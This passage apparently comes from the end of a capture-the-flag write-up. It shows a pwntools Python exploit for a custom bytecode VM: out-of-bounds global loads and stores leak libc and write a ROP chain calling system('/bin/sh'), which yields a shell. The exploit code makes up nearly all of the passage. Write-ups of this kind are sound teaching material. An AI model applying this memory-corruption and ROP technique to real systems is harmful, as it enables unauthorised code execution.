BR_OP     = 0x6
BRT_OP    = 0x7
BRF_OP    = 0x8
ICONST_OP = 0x9
LOAD_OP   = 0x0a
GLOAD_OP  = 0x0b
STORE_OP  = 0x0c
GSTORE_OP = 0x0d
PRINT_OP  = 0x0e
POP_OP    = 0x0f
CALL_OP   = 0x10
RET_OP    = 0x11
HLT_OP    = 0x12

def init():
    global io

    io = start()

def op_add():
    return p32(IADD_OP)

def op_sub():
    return p32(ISUB_OP)

def op_iconst(arg):
    return p32(ICONST_OP) + p32(arg, signed=True)

def op_load(arg):
    return p32(LOAD_OP) + p32(arg, signed=True)

def op_gload(arg):
    return p32(GLOAD_OP) + p32(arg, signed=True)

def op_store(arg):
    return p32(STORE_OP) + p32(arg, signed=True)

def op_gstore(arg):
    return p32(GSTORE_OP) + p32(arg, signed=True)

def op_pop():
    return p32(POP_OP)

def op_hlt():
    return p32(HLT_OP)

def solve():

    payload = b""

    """
    first we:
    - save the global pointer & code pointer stored in the VM structure to the vm stack
    - calculate the address to the return address
    """

    payload += op_iconst(0x1337)
    payload += op_gload(-(0x20f0 // 4))
    payload += op_gload(-(0x20ec // 4))
    payload += op_gload(-(0x2100 // 4))
    payload += op_iconst(0x218)
    payload += op_add()
    payload += op_gload(-(0x20fc // 4))

    """
    now there are many things we can do from here, but i decided to:
    - leak libc by ovewriting vm->globals with the return address of the main stack frame which contains a pointer to __libc_start_main
    - we can do the read inplace (store it on the vm stack)
    - compute offsets to ROPchain and write rop to the stack
    - rewrite vm->globals to NULL for future vm_free 
    - halt vm to get shell!
    """

    rop = ROP(libc)
    pop_rdi_offset = rop.find_gadget(["pop rdi", "ret"]).address

    pop_rdi = -(libc.sym["__libc_start_main"] + 0xf3 - pop_rdi_offset)
    sh      = next(libc.search(b"/bin/sh")) - libc.sym["__libc_start_main"] - 0xf3
    system  = libc.sym["system"] - libc.sym["__libc_start_main"] - 0xf3
    ret     = pop_rdi + 1

    libc_consts = [
        ret,
        pop_rdi,
        sh,
        system
    ][::-1]

    payload += op_store(-(0xf80 // 4))
    payload += op_store(-(0xf84 // 4))
    
    for i in range(len(libc_consts)):
        payload += op_gload(0)
        payload += op_iconst(libc_consts[i])
        payload += op_add()
        payload += op_gload(1)

    for i in range(0, 8, 2):
        payload += op_gstore(i + 1)
        payload += op_gstore(i)
    
    payload += op_iconst(0x0) * 2
    payload += op_store(-(0xf80 // 4))
    payload += op_store(-(0xf84 // 4))

    payload += op_hlt()

    payload = payload.ljust(0x1FF, b'\x00')

    io.sendline(payload)

    io.interactive()


def main():
    
    init()
    solve()
    

if __name__ == '__main__':
    main()

Running it works!

final

ありがとうございます!😊

This post is licensed under CC BY 4.0 by the author.